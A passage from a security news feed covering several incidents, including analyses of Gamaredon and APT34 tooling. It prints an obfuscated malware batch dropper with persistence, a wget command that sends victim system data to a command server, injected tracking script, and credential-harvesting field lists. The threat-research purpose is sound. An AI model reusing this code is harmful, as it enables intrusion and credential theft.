  • Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods such as virtual private networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. VPN is only as secure as the connected devices.
  • Employ training and awareness programs to educate users on the warning signs of a phishing or social engineering attack.

The ICS-CERT credited Josiah Bryan and Giancarlo Palavicini for reporting this vulnerability to NCCIC.

Pierluigi Paganini

(SecurityAffairs – Rockwell, hacking)

The post A flaw in Rockwell Controller allows attackers to redirect users to malicious Sites appeared first on Security Affairs.

Zero-day vulnerability in Oracle WebLogic

Security experts are warning of a dangerous zero-day remote code vulnerability that affects the Oracle WebLogic service platform.


Oracle WebLogic wls9_async and wls-wsat components are affected by a deserialization remote command execution zero-day vulnerability.

This zero-day flaw affects all Weblogic versions, including the latest one, that have the wls9_async_response.war and wls-wsat.war components enabled.

Oracle WebLogic Server is a Java EE application server currently developed by Oracle Corporation, it is used by numerous applications and web enterprise portals based on Java technology. The flaw received the identifier CNVD-C-2019-48814.

An attacker could exploit the vulnerability to remotely execute commands without authorization by sending a specially crafted HTTP request.

Weblogic zeroday

According to the bulletin CNTA-2019-0015 issued by CNCERT/CC, the flaw affects the WebLogic 10.x and WebLogic 12.1.3 versions. The criticality flaw has not yet been addressed by Oracle.

Experts recomments to disable vulnerable modules “wls9_async_response.war” and “wls-wsat.war”, or to inhibit access to URLs “/ _async / * “and” / wls-wsat / * “within Oracle WebLogic installs.

Experts at KnownSec 404 Team searched for vulnerable instances online by using the ZoomEye search engine, they found 36,173 installs, most of them in the US and China.

Weblogic zeroday 2

Experts at F5 Labs revealed to have already spotted a campaign exploiting the zero-day flaw in Weblogic servers.

Pierluigi Paganini

(SecurityAffairs – Weblogic, zero-day)

The post Zero-day vulnerability in Oracle WebLogic appeared first on Security Affairs.

Stuart City is the new victim of the Ryuk Ransomware

Another city fell victim of a malware attack, systems at the city of Stuart, Fla., were infected by the Ryuk ransomware on April 13, 2018.

Law enforcement is investigating a ransomware attack that hit the City of Stuart on April 13, 2018. The Ryuk malware infected several servers and forced them offline.

“City officials on Wednesday confirmed a computer virus that infected servers over the weekend was the result of a ransomware attack.” reported the website TCPalm.

“The virus detected Saturday froze up the city’s servers and they are still offline, said Stuart City manager David Dyess.”

According to officials, the ransomware attack targeting the city of Stuart started with a phishing email, the infection was discovered by an IT employee who was setting up a new server.

City manager David Dyess confirmed that the city systems were infected with a strain of the Ryuk ransomware, but he did not disclose the Bitcoin ransom demanded by crooks.

“They discovered we had two things going on: We had what’s called a trickbot, which is basically a malware type of regular virus which can lead to other more serious issues,” Dyess said. “We also had the Ryuk virus that is an encryptor virus, where it encrypts your files and specifically likes to target your servers.”

Stuart city

At the time of writing, Dyess confirmed that experts are investigating to determine the way the attackers exploited to infect the systems.

IT staff at Stuart city has restored servers, payroll, utilities, and budgeting, only city employees still don’t have access to their email accounts.

Stuart’s police and fire departments are still offline, Dyess believe that overall services should be fully restored within the next week.

Early March, another city was hit by the same ransomware, computers of Jackson County, Georgia, were infected with Ryuk that paralyzed the government activity until officials decided to pay a $400,000 ransom to decrypt the files.

Unlike the Jackson County, Stuart City refused to pay the ransom.

“We are not negotiating with them. We are in the process of trying to rebuild our systems,” Dyess said. “We also began scanning every server in the city and every (personal computer) and every laptop in every department to eliminate any viruses on those outer machines.”

Dyess confirmed that the impact was limited thanks to the availability of city’s computer backup system.

“If we wouldn’t have had these viable backups, we would probably be in a situation where we had to move into negotiations,” he said. “But with those backups in place, why would we negotiate?”

The Ryuk ransomware appears connected to Hermes malware that was associated with the notorious Lazarus APT group.

The same ransomware was recently used in an attack that affected the newspaper distribution for large major newspapers, including the Wall Street Journal, the New York Times, and the Los Angeles Times.

Further investigation on the malware allowed the experts from security firms FireEye and CrowdStriketo discover that threat actors behind the 
Ryuk ransomware are working with another cybercrime gang to gain access to target networks. They are collaborating with threat actors behind TrickBot, a malware that once infected a system creates a reverse shell back to the attackers allowing them to break into the network.

Experts at Crowdstrike believe the Ryuk ransomware is operated by a crime gang they tracked as GRIM SPIDER, in particular by its Russian based cell dubbed WIZARD SPIDER that is behind TrickBot.

Experts pointed out that Hermes was available for sale into the online underground community, attackers could have purchased it to create their own version of Ryuk.

Pierluigi Paganini

(SecurityAffairs – Ryuk ransomware, Stuart city)

The post Stuart City is the new victim of the Ryuk Ransomware appeared first on Security Affairs.

The Russian Shadow in Eastern Europe: Gamaredon ‘s Ukrainian MOD Campaign

Security researchers at Yoroi-Cybaze ZLab uncovered a new campaign carried out by the Russian state-actor dubbed Gamaredon.

Introduction

Few days after the publication of our technical article related to the evidence of possible APT28 interference in the Ukrainian elections, we spotted another signal of a sneakier on-going operation.

This campaign, instead, seems to be linked to another Russian hacking group: Gamaredon.  The Gamaredon APT was first spotted in 2013 and in 2015, when researchers at LookingGlass shared the details of a cyber espionage operation tracked as Operation Armageddon, targeting other Ukrainian entities. Their “special attention” on Eastern European countries was also confirmed by CERT-UA, the Ukrainian Computer Emergency Response Team.

The discovered attack appears to be designed to lure military personnel: it  leverage a legit document of the “State of the Armed Forces of Ukraine” dated back in the 2nd April 2019. 

Figure 1: Fake document shown after infection

For this reason, Cybaze-Yoroi ZLAB team dissected this suspicious sample to confirm the possible link with Russian threat actors.

Technical Analysis

The origin of the infection is an executable file pretending to be an RTF document.

Sha25641a6e54e7ac2d488151d2b40055f3d7cacce7fb53e9d33c1e3effd4fce801410
ThreatGamaredon Pteranodon stager (SFX file)
Ssdeep12288:VpRN/nV+Nn3I4Wyawz2O7TE+sNEAMqdJnGB6q5c7pQbaOwWsAsK0iR7bkfeanZ8O:VpT/nV+N3I

Table 1: Information about analyzed sample

Actually, the file is a Self Extracting Archive (SFX) claiming to be part of some Oracle software with an invalid signature. Its expiration date has been set up the 16th of March 2019.

Figure 2: Fake Oracle certificate with an expiration date set on 16th of March 2019

A first glance inside the  SFX archive reveals four different files. One of them is batch file containing the actual infection routine.

Figure 3: Files contained in SFX archive
@echo offset xNBsBXS=%random%*JjuCBOSFor %%q In (wireshark procexp) do (TaskList /FI “ImageName EQ %%q.exe” | Find /I “%%q.exe”)If %ErrorLevel% NEQ 1 goto exitIf SddlzCf==x86 Set WqeZfrx=x64if SddlzCf==qKLGBsL set SddlzCf=%random%*xNBsBXS-JjuCBOSset “ldoGIUv=%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\”CEFNPKLIf SddlzCf==x86 Set WqeZfrx=x64set “UlHjSKD=%USERPROFILE%”set qKLGBsL=%SddlzCf%+%JjuCBOS%-xNBsBXSset fnQWAZC=winsetupset xNBsBXS=%random%*JjuCBOSset qKLGBsL=%SddlzCf%+%JjuCBOS%-xNBsBXSset “paJvVjr=Document”if SddlzCf==qKLGBsL set SddlzCf=%random%*xNBsBXS-JjuCBOSset eBqwVLK=%fnQWAZC%.lnkCEFNPKLif SddlzCf==qKLGBsL set SddlzCf=%random%*xNBsBXS-JjuCBOSset YFCaOEf=28262set qKLGBsL=%SddlzCf%+%JjuCBOS%-xNBsBXSset vvozoFB=11326set lDwWuLo=26710If SddlzCf==x86 Set WqeZfrx=x64set prJqIBB=dcthfdyjdfcdst,tvset qKLGBsL=%SddlzCf%+%JjuCBOS%-xNBsBXSif SddlzCf==qKLGBsL set SddlzCf=%random%*xNBsBXS-JjuCBOStaskkill /f /im %fnQWAZC%.exeCEFNPKLRENAME “%lDwWuLo%” %lDwWuLo%.exeset xNBsBXS=%random%*JjuCBOS%lDwWuLo%.exe “-p%prJqIBB%set qKLGBsL=%SddlzCf%+%JjuCBOS%-xNBsBXScopy /y “%fnQWAZC%” “%UlHjSKD%\%fnQWAZC%.exe”if SddlzCf==qKLGBsL set SddlzCf=%random%*xNBsBXS-JjuCBOSif exist “%UlHjSKD%\%fnQWAZC%.exe” call :GhlJKaGIf SddlzCf==x86 Set WqeZfrx=x64if not exist “%UlHjSKD%\%fnQWAZC%.exe” call :PEEnqrLset xNBsBXS=%random%*JjuCBOSRENAME “%YFCaOEf%” %eBqwVLK%if SddlzCf==qKLGBsL set SddlzCf=%random%*xNBsBXS-JjuCBOScopy “%eBqwVLK%” “%ldoGIUv%” /yset qKLGBsL=%SddlzCf%+%JjuCBOS%-xNBsBXSRENAME “%vvozoFB%” “%paJvVjr%.docx”if SddlzCf==qKLGBsL set SddlzCf=%random%*xNBsBXS-JjuCBOS”%CD%\%paJvVjr%.docx”set xNBsBXS=%random%*JjuCBOSexit /b
:GhlJKaGif SddlzCf==qKLGBsL set SddlzCf=%random%*xNBsBXS-JjuCBOSstart “” “%UlHjSKD%\%fnQWAZC%.exe”CEFNPKLexit /b
:PEEnqrLset xNBsBXS=%random%*JjuCBOSRENAME “%fnQWAZC%” %fnQWAZC%.exe::6start “” “%fnQWAZC%.exe”If SddlzCf==x86 Set WqeZfrx=x64exit /b

Firstly, this batch script looks for the presence of running Wireshark and Process Explorer programs through the tasklist.exe utility. Then it renames the “11326” file in “Document.docx” and opens it. This is the decoy document seen in Figure 1. 

The third step is to extract the contents of the password protected archive named “26710”. The scripts uses the hard-coded password “dcthfdyjdfcdst,tv” to extract its content, placing them it on “%USERPROFILE%\winsetup.exe” and creating a LNK symlink into the “%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\” directory to ensure its persistence.

Sha256653a4205fa4bb7c58ef1513cac4172398fd5d65cab78bef7ced2d2e828a1e4b5
ThreatGamaredon Pteranodon stager (SFX)
Ssdeep12288:9pRN/nV+Nn4mNoks/EysKvqjigldJuFjBqg9DmTBs34I8:9pT/nV+N4QokKK7zg9qgQI8

Table 2: Information about SFX stager

This additional file is a SFX file containing another script and a PE32 binary.

Figure 4: Files contained in SFX archive

MicrosoftCreate.exe” file is the UPX-packed version of the “wget” tool compiled for Window, a free utility for non-interactive HTTP downloads and uploads, a flexible tool commonly used by sys-admins and sometimes abused by threat actors.

The actual malicious logic of the Pteranodon implant is contained within the “30347.cmd” script. Besides junk instructions and obfuscation, the malware gather information about the compromised machine through the command “systeminfo.exe”. The results are stored into the file “fnQWAZC” and then sent to the command and control server “librework[.ddns[.net”, leveraging the wget utility previously found.

Figure 5: The C2 and obfuscations technique
MicrosoftCreate.exe –user-agent=”Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0″ –post-data=”versiya=arm_02.04&comp=ADMIN-PC&id=ADMIN-PC_del&sysinfo=Nome host:                            ADMIN-PC+###…….”
Figure 6: Information about victim machine sent to C2

The malware also schedules the execution of two other actions.

Figure 7: Persistence through task schedule

The first one tries to contact “bitwork[.ddns[.net” to download a “setup.exe” file and store it in the same folder. The other file, “ie_cash.exe”, is stored into the  “%APPDATA%\Roaming\Microsoft\IE\” folder. Despite the different name, it actually is another copy of the wget tool.

Figure 8: Persistence through task schedule (II)

The second scheduled activity is planned every 32 minutes and it is designed to run the files downloaded by the previous task. A typical trick part of the Gamaredon arsenal from long time: in fact, the recovered sample is part of the Pteranodon implant and matches its typical code patterns, showing no relevant edits with respect to previous variants.

In the end, investigating the “librework[.ddns[.net” domain we discovered several other samples connect to the same C2. All of them appeared in-the-wild during the first days of April, suggesting the command infrastructure might still be fully functional.

Figure 9: other samples linked to “librework[.ddns[.net” C2 (Source:VT)

Conclusion

The Pteranodon implant seems to be constantly maintained by the Gamaredon APT group since 2013, a tool the attackers found very effective since they are still using it after such a long time. Apart this technical consideration, is quite interesting to notice how strong seems to be the Russian interest towards the East-Europe, along with the other recent state-sponsored activities possibly aimed to interfere with the Ukrainian politics (See “APT28 and Upcoming Elections: evidence of possible interference” and Part II), confirming this cyber-threat is operating in several fronts.

Further details, including Indicators of Compromise and Yara rules, are reported in the analysis published on the Yoroi Blog.  

Pierluigi Paganini

(SecurityAffairs – Ukraine, Gamaredon)

The post The Russian Shadow in Eastern Europe: Gamaredon ‘s Ukrainian MOD Campaign appeared first on Security Affairs.

OilRig APT uses Karkoff malware along with DNSpionage in recent attacks

Iran-linked OilRig cyberespionage group is using the reconnaissance malware Karkoff along with DNSpionage in recent campaigns.Iran-linked OilRig cyberespione group is using the reconnaissance malware Karkoff along with DNSpionage in recent campaigns.

The OilRig APT group, the threat actor behind the DNSpionage malware campaign, is carrying out a new sophisticated and targeted operation that infects victims with a new variant of the dreaded malware.

DNSpionage is a custom RAT that uses HTTP and DNS communication to connect with the C&C server.

Threat actors distributed the malware through compromised websites and weaponized documents.

“In February, we discovered some changes to the actors’ tactics, techniques and procedures (TTPs), including the use of a new reconnaissance phase that selectively chooses which targets to infect with malware.” reads the analysis published by Talos. “In April 2019, we also discovered the actors using a new malware, which we are calling “Karkoff.” reads the analysis published by Talos.

DNSpionage decoy doc

According to Cisco Talos threat research team, the attackers are leveraging on new tactics, techniques, and procedures to improve the efficacy of their operations.

Unlike previous attacks, the group is now using a new malware, tracked as Karkoff, for reconnaissance purposes. Karkoff is used by hackers to surgically select a target and remain under the radar, it allows to gather system information related to the workstation environment, operating system, domain, and list of running processes on the victims’ machine.

Karkoff is developed in .NET, it also allows attackers to remotely execute arbitrary code on compromised hosts.

The experts link the DNSpionage and Karkoff malware after observing overlaps between their C2 infrastructure.

Experts noticed that the malware searches for two specific anti-virus solutions, Avira and Avast. If one of them is installed on the target system, a specific flag will be set, and some options from the configuration file will be ignored.

Researchers at Talos noticed that the Karkoff malware generates a log file on the compromised machine which tracks all commands it has executed and related timeline.

“From an incident response point of view, it’s interesting to note that the malware generates a log file: C:\\Windows\\Temp\\MSEx_log.txt. The executed commands are stored in this file (xored with ‘M’) with a timestamp.” continues the experts. “This log file can be easily used to create a timeline of the command execution which can be extremely useful when responding to this type of threat. With this in mind, an organisation compromised with this malware would have the opportunity to review the log file and identify the commands carried out against them.” “

Attackers behind the DNSpionage campaigns continue to be focused on entities in the Middle Eastern region, including Lebanon and the United Arab Emirates (UAE).

“The threat actor’s ongoing development of DNSpionage malware shows that the attacker continues to find new ways to avoid detection.” “DNS tunneling is a popular method of exfiltration for some actors and recent examples of DNSpionage show that we must ensure DNS is monitored as closely as an organization’s normal proxy or weblogs.” concludes Talos. “The discovery of Karkoff also shows the actor is pivoting and is increasingly attempting to avoid detection while remaining very focused on the Middle Eastern region.”

Pierluigi Paganini

(SecurityAffairs – hacking, DNSpionage)

The post OilRig APT uses Karkoff malware along with DNSpionage in recent attacks appeared first on Security Affairs.

Kaspersky speculates the involvement of ShadowPad attackers in Operation ShadowHammer

Experts at Kaspersky Lab linked the recent supply-chain attack targeted ASUS users to the “ShadowPad” threat actor and the CCleaner incident.

Security researchers at Kaspersky Lab linked the recent supply-chain attack that hit ASUS users (tracked as Operation ShadowHammer) to the “ShadowPad” threat actor. Experts also linked the incident to the supply chain attack that targeted CCleaner in September 2018. The Operation ShadowHammer was dcampaign was uncovered by experts from Kaspersky Lab and took place between June and November 2018, but experts discovered it in January 2019. iscovered in January 2019, attackers used a Trojanized version of the ASUS Live Update utility to install a backdoor on specific devices, selected based on their MAC addresses. ASUS has since released software updates to address the issue. 

According to Kaspersky, threat actors tampered with a legitimate binary that was initially compiled in 2015 and that was digitally signed to avoid detection.

The malicious code injected in the binaries allows to fetch and install a backdoor used in the attack to control the compromised systems.

“It is important to note that any, even tiny, tampering with executables in such a case normally breaks the digital signature. However, in this case, the digital signature was intact: valid and verifiable. We quickly realized that we were dealing with a case of a compromised digital signature.” reads the analysis published by Kaspersky.

“We believe this to be the result of a sophisticated supply chain attack, which matches or even surpasses the ShadowPad and the CCleaner incidents in complexity and techniques. The reason that it stayed undetected for so long is partly the fact that the trojanized software was signed with legitimate certificates (e.g. “ASUSTeK Computer Inc.”).”

The supply chain attack was very sophisticated and very targeted, the backdoor was designed to be installed on only 600 select devices, identified through their MAC address.

Some of the MAC addresses targeted by the hackers were rather popular, such as i.e. 00-50-56-C0-00-08 that belongs to the VMWare virtual adapter VMNet8 and is shared by all users of a certain version of the VMware software for Windows.

Another MAC address used in the attack was 0C-5B-8F-27-9A-64, which belongs to the MAC address of a virtual Ethernet adapter designed by Huawei for the USB 3G modem, model E3372h.

During their investigation, experts found other digitally signed binaries from three other vendors in Asia. The binaries are signed with different certificates and a unique chain of trust, but experts pointed out that the way the binaries were trojanized was the same in the three cases.

“The malicious code was not inserted as a resource, neither did it overwrite the unused zero-filled space inside the programs. Instead, it seems to have been neatly compiled into the program, and in most cases, it starts at the beginning of the code section as if it had been added even before the legitimate code.” continues the analysis. “Even the data with the encrypted payload is stored inside this code section. This indicates that the attackers either had access to the source code of the victim’s projects or injected malware on the premises of the breached companies at the time of project compilation.”

ASUS ShadowPad

Experts found many similarities between non-ASUS-related cases and the ASUS supply chain attack, such as the algorithm used to calculate API function hashes, and the use of IPHLPAPI.dll from within a shellcode embedded into a PE file.

The investigators also found a connection between the ASUS attack to the ShadowPad backdoor that was first detected in 2017 and that was attributed to the Axiom group (also known as APT17 or DeputyDog).

The most popular campaign attributed to the APT17 group is the attack on the Google’s infrastructure, also known as Operation Aurora. For almost a decade the APT17 targeted government organizations in several Southeast Asian countries and the US, NGOs, defense contractors, law firms, IT firms, and mining companies.

According to malware experts at Intezer the code used in the CCleaner attack has many similarities with the code used by the Axiom group.

Experts at Kaspersky noticed that the malicious code used in the Operation ShadowHammer have reused algorithms from multiple malware samples, including many of PlugX RAT, a backdoor used by many Chinese-speaking hacker groups.

“ShadowPad, a powerful threat actor, previously concentrated on hitting one company at a time. Current research revealed at least four companies compromised in a similar manner, with three more suspected to have been breached by the same attacker.” Kaspersky concludes. 

“How many more companies are compromised out there is not known. What is known is that ShadowPad succeeded in backdooring developer tools and, one way or another, injected malicious code into digitally signed binaries, subverting trust in this powerful defense mechanism,”

Pierluigi Paganini

(SecurityAffairs – Asus Supply Chain attack, ShadowPad )

The post Kaspersky speculates the involvement of ShadowPad attackers in Operation ShadowHammer appeared first on Security Affairs.

Bodybuilding.com forces password reset after a security breach

Bad news for fitness and bodybuilding passionates, the popular online retailer Bodybuilding.com announced that hackers have broken into its systems.

The popular online retailer website Bodybuilding.com announced last week that hackers have broken into its systems. The website offers any kind of fitness articles, exercises, workouts, and supplements.

The company confirmed it has no evidence that personal customer information was accessed or misused, as a precautionary measure the company is notifying all current and former users and customers.

“Bodybuilding.com recently became aware of a data security incident that may have affected certain customer information in our possession. We have no evidence that personal information was accessed or misused, but we are directly notifying all current and former users and customers out of an abundance of caution.” reads the announcement published on the website.

“We became aware of a data security incident involving unauthorized access to our systems in February 2019. We engaged one of the leading data security firms to conduct a thorough investigation, which traced the unauthorized activity to a phishing email received in July 2018. On April 12, 2019, we concluded our investigation and could not rule out that personal information may have been accessed.”

The company hired a security firm to investigate the incident, it discovered that the attack begun with a phishing email received in July 2018.

The company reported the incident to law enforcement and with the help of the security firm is addressing the flaws exploited by the attackers and remediate the incident. The IT staff behind Bodybuilding.com also introduced additional security measures and forced a password reset for its customers.

Data potentially exposed in the incident includes name, Bodybuilding.com usernames and passwords. email address, billing/shipping addresses, phone number, order history, any communications with Bodybuilding.com, birthdate, and any information included in the BodySpace profile.

According to the firm, potentially accessed data don’t include full payment card numbers because the firm does not store them.

“The information potentially accessed in this incident does NOT include full credit or debit card numbers, as we do not store those numbers when customers make purchases in our store.” continues the data breach notification note. “If you’ve opted to store your card in your account, we store only the last four digits of your payment card number for reference and use by you for subsequent purchases, but never the entire card number.”

Bodybuilding.com Discloses Data Breach

As usual. Bodybuilding.com users have to change their password for any other account on which they might have used the same credentials as for the Bodybuilding.com account.

Below recommendations provided by the company:

  • Change your password for any other account on which you used the same or similar information used for your Bodybuilding.com account.
  • Review your accounts for suspicious activity.
  • Be cautious of any unsolicited communications that ask for your personal data or refer you to a web page asking for personal data.
  • Avoid clicking on links or downloading attachments from suspicious emails.

Pierluigi Paganini

(SecurityAffairs – fingerprints, Genesis Store)

The post Bodybuilding.com forces password reset after a security breach appeared first on Security Affairs.

FireEye experts found source code for CARBANAK malware on VirusTotal

Cybersecurity researchers from FireEye revealed that the Carbanak source code has been available on VirusTotal for two years, and none noticed it before.

Researchers at FireEye discovered that the Carbanak source code has been available on VirusTotal for two years, but it was not noticed before.

The Carbanak gang (aka FIN7, Anunak or Cobalt) stole over a billion euros from banks across the world, the name “Carbanak” comes with the name of the malware they used to compromise computers at banks, other financial institutions, restaurants, and other industries.

CARBANAK cybercrime gang was first uncovered in 2014 by Kaspersky Lab that dated its activity back to 2013 when the group leveraged the Anunak malware in targeted attacks on financial institutions and ATM networks. Between 2014 and 2016 the group used a new custom malware dubbed Carbanak that is considered a newer version of Anunak.

Starting from 2016 the group developed a new custom malware using Cobalt Strike, a legitimate penetration testing framework.

CARBANAK

The experts discovered the source code, builders, and some previously unknown plugins in two different RAR archives.

The two archives were both uploaded two years ago from the same Russian IP address.

“On the heels of that publication, our colleague Nick Carr uncovered a pair of RAR archives containing CARBANAK source code, builders, and other tools (both available in VirusTotal: kb3r1p and apwmie).” reads a blog post published by FireEye.

“CARBANAK source code was 20MB comprising 755 files, with 39 binaries and 100,000 lines of code. Our goal was to find threat intelligence we missed in our previous analyses.”

Last year, law enforcement arrested between January and June three Ukrainian suspects, Dmytro Fedorov, Fedir Hladyr, and Andrii Kopakov.

Fedorov, is a skilled hacker and, who is suspected to be a manager of the group, was arrested at the request of U.S. officials in Bielsko-Biala, Poland, in January and is currently waiting for his extradition to the United States.

In January 2018 foreign authorities also arrested Fedir Hladyr in Dresden, Germany, he is currently detained in Seattle pending trial.  Hladyr is suspected to be a system administrator for the group.

In late June 2018, foreign authorities arrested Andrii Kolpakov in Lepe, Spain.  The man is suspected to be a supervisor of the group. He is currently detained in Spain pending the United States’ request for extradition.

Pierluigi Paganini

(SecurityAffairs – Carbanak, Russia)

The post FireEye experts found source code for CARBANAK malware on VirusTotal appeared first on Security Affairs.

Iran-linked APT34: Analyzing the webmask project

Security expert Marco Ramilli published the findings of a quick analysis of the webmask project standing behind the DNS attacks implemented by APT34 (aka OilRig and HelixKitten).

Thanks to the leaked source code it is now possible to check APT34 implementations and techniques.

Contest:

Since at least 2014, an Iranian threat group tracked by FireEye as APT34 has conducted reconnaissance aligned with the strategic interests of Iran. The group conducts operations primarily in the Middle East, targeting financial, government, energy, chemical, telecommunications and other industries. Repeated targeting of Middle Eastern financial, energy and government organisations leads FireEye to assess that those sectors are a primary concern of APT34. The use of infrastructure tied to Iranian operations, timing and alignment with the national interests of Iran also lead FireEye to assess that APT34 acts on behalf of the Iranian government. (Source: MISP Project).

On April 19 2019 researchers at Chronicle, a security company owned by Google’s parent company, Alphabet, have examined the leaked tools, exfiltrated the past week on a Telegram channel, and confirmed that they are indeed the same ones used by the OilRig attackers. OilRig has been connected to a number of intrusions at companies and government agencies across the Middle East and Asia, including technology firms, telecom companies, and even gaming companies. Whoever is leaking the toolset also has been dumping information about the victims OilRig has targeted, as well as data identifying some of the servers the group uses in its attacks.

According to Duo, OilRig delivered Trojans that use DNS tunneling for command and control in attacks since at least May 2016. Since May 2016, the threat group has introduced new tools using different tunneling protocols to their tool set” Robert Falcone of Palo Alto Networks’ Unit 42 research team wrote in an analysis of the group’s activities.

“Regardless of the tool, all of the DNS tunneling protocols use DNS queries to resolve specially crafted subdomains to transmit data to the C2 and the answers to these queries to receive data from the C2.”

Leaked Source code

The initial leaked source code sees three main folders: webmask, poisonfrog and Webshells_and_Panel. While webmask and poisonfrogseems to be single projects, the folder Webshells_and_Panel looks like wrapping more projects into a single bucket. But, for today, let’s focus on webmask.

WEBMask Focus

The webmaskk project, in my personal opinion, is an APT34 distinction since implementing their DNS attack core. APT34 is well-known to widely use DNS Hijacking in order to redirect victims to attackers websites. So let’s see what they’ve implemented so far on this direction.

The webmask project comes with both: a guide (guide.txt) and an installation script (install.sh). From the latter we might appreciate the NodeJS installed version which happens to be 6.X. This version was released on 2016-04-26 for the first time. Nowadays is still on development track as the name of “Boron”. According to the NodeJS historic versioning that project could not be dated before April 2016 since Nodejs_6.x was not existing before that date. The guide.txt file suggests two solutions (this is the used term) both of them base their ‘core engine’ on a developed DNS server, used as authoritative name servers to respond crafted ‘A’ records to specific requests. The attackers suggest to use solution2 (they write “use this” directly on configuration file), the one who implements DNS server in NodeJS language. On the other side the Solution1 uses python as DNS server. The following image shows the suggested Solution.

APT34: WebMask Project Suggested Solution

Some domain names and some IPs are used as configuration example. Personally I always find interesting to see the attacker suggested examples, since they lets a marked flavour of her. That time the attacker used some target artefacts (IP and DNS) belonging to ‘Arab Emirates’ net space while she used as a responsive artefact (the one used to attack) an IP address belonging to a NovinVPS service.

The guide follows on describing the setup of ICAP proxy server, used to proxy the victims to the real destination but trapping the entire connections. The attacker suggests Squid3 and guides the operator to install and to configure it. She uses as ICAP handler a simple python script placed into icap/icap.pyfolder. This script has been developed in order to log and to modify the ICAP/connection flow coming from squid3 proxy. Then a well-known Haproxy is used as High Availability service for assuring connections and finally certbot (Let’s Encrypt) is used to give valid certificate to squid3 (but it’s not a mandatory neither a suggested step).

DNS Server scripts

In the folder dns-redir 3 files are placed. A configuration file called config.json is used by dnsd.py. The python script implements a class named MyUDPHandler which is given to the native SocketServer.UDPServer and used as UDP handler. The script overrides only DNS A records if included into the overrides object (variable at the beginning of source code). In other words if the DNS request is an A record and if the requested name belongs to specific domain name, the script responds with the attacker IP address. The following image shows the main 3 steps of the override chain.


DNSD.py: Three steps DNS overriding chain

According to the guide.txt the suggested solution won’t be the dnsd.py, but the attacker would prefer the dnsd.js script. This script appears not externally configurable (it does not import config.json) so if you want to configure it you need to manually edit the script source code. The source is written in an classic style ECMAScript without any fancy or new operators/features introduced in ECMAScript6 and ECMAScript7. The dnsd.js performs the same tasks performed by dnsd.py without any specific change.

ICAP script

In the icap folder a python script called icap.py is placed. This script handles ICAP flows coming from squid3, extracts desired informations and injects tracking pixels. The python script implements a ThreadingSimpleServer as an implementation of SocketServer.ThreadingMixInwhich is a native framework for multi-threading Network servers. SocketServer.ThreadingMixIn needs a local address and local port to be spawned and a BaseICAPRequestHandler class as second parameter in order to handle ICAP flows. The attacker specialised that class by referring to the general ICAPHandler. Aims of the script is to log into separated files the following information: credentials, cookies, injected files and headers. It silently injects a tracking pixel into communications by adding the following javascript to HTML body.

script = ';$(document).ready(function(){$(\'<img src="file://[ip]/resource/logo.jpg"><img src="http://WPAD/avatar.jpg">\');});'

If the parsed request is a HTTP POST the ICAPHandler tries to extract credentials through special function called: extract_login_password. The following image shows the process flow of the credential extraction.

ICAP.py: Credential Extraction Process

It would be interesting, at least in my point of view, to check the used patterns as login detection. For example the parsing function looks for the following “form names”:

logins = ['login', 'log-in', 'log_in', 'signin', 'sign-in', 'logon', 'log-on']

It also looks for the following user field names:

userfields = ['log','login', 'wpname', 'ahd_username', 'unickname', 'nickname', 'user', 'user_name','alias', 'pseudo', 'email', 'username', '_username', 'userid', 'form_loginname', 'loginname',
 'login_id', 'loginid', 'session_key', 'sessionkey', 'pop_login', 'uid', 'id', 'user_id', 'screename', 'uname', 'ulogin', 'acctname', 'account', 'member', 'mailaddress', 'membername', 'login_username', 'login_email', 'loginusername', 'loginemail', 'uin', 'sign-in', 'usuario']

and finally it also looks for the following password fields names:

passfields = ['ahd_password', 'pass', 'password', '_password', 'passwd', 'session_password', 'sessionpassword', 'login_password', 'loginpassword', 'form_pw', 'pw', 'userpassword', 'pwd', 'upassword', 'login_password','passwort', 'passwrd', 'wppassword', 'upasswd','senha','contrasena', 'secret']

Interesting to see specific string patterns such as (but not limited to): form_pw, ahd_password, upassword, senha, contrasena, which are quite indicative to victim scenarios. For example strings such as: senha, contrasena,usuario, and so on seems to be related to”Spanish” / “Portuguese” words. So if it’s true (and google translate agrees with me) it looks like APT34 are proxying some connections that might have those username and password fields, which might refer to “Spanish”/”Portuguese” targets. But this is only a Hypothesis.

The icap.py is able to intercept basic authentication headers, cookies and general headers as well, implementing similar functions able to extract interesting information and eventually to modify them if needed. I wont describe every single functions but one of the most interesting function that is worth of being showed is the inject_RESPMOD which injects a tracking image into the ICAP flow. The following image shows the attacker’s implementation of the Injection_RESPMOD function.

ICAP.py: script injection function

The injected script is added to the HTML body and eventually is GZipped and shipped back. In such a way the attacker tracks who is landing to the target domain.

Interesting points

  • WebMask is >= April 2016 (From Installed Dependencies)
  • APT34 might target ‘Arab Emirate’ (From examples into config files)
  • APT34 might target Spanish/Portuguese (From code into the extract_login_password function )
  • APT34 might use NovinVPS (From examples into config files)
  • APT34 needs credentials for change Authoritative DNS (From guide.txt)

The original post is available at the following URL:

About the Author: Marco Ramilli founder of Yoroi

I am a computer security scientist with an intensive hacking background. I do have a MD in computer engineering and a PhD on computer security from University of Bologna. During my PhD program I worked for US Government (@ National Institute of Standards and Technology, Security Division) where I did intensive researches in Malware evasion techniques and penetration testing of electronic voting systems.

I do have experience on security testing since I have been performing penetration testing on several US electronic voting systems. I’ve also been encharged of testing uVote voting system from the Italian Minister of homeland security. I met Palantir Technologies where I was introduced to the Intelligence Ecosystem. I decided to amplify my cybersecurity experiences by diving into SCADA security issues with some of the biggest industrial aglomerates in Italy. I finally decided to found Yoroi: an innovative Managed Cyber Security Service Provider developing some of the most amazing cybersecurity defence center I’ve ever experienced! Now I technically lead Yoroi defending our customers strongly believing in: Defence Belongs To Humans

Edited by Pierluigi Paganini

(Security Affairs – APT34, DNS attacks)



The post Iran-linked APT34: Analyzing the webmask project appeared first on Security Affairs.

EmCare reveals patient and employee data were hacked

EmCare disclosed that a number of employees’ email accounts had been hacked, potentially exposing personal information of patients and employees.EmCare disclosed that a number of employees’ email accounts had been hacked, potentially exposing personal information of patients and employees.

US healthcare firm EmCare Inc disclosed that a number of employees’ email accounts had been accessed, potentially exposing personal information of almost 60,000 people, including 31,000 patients.

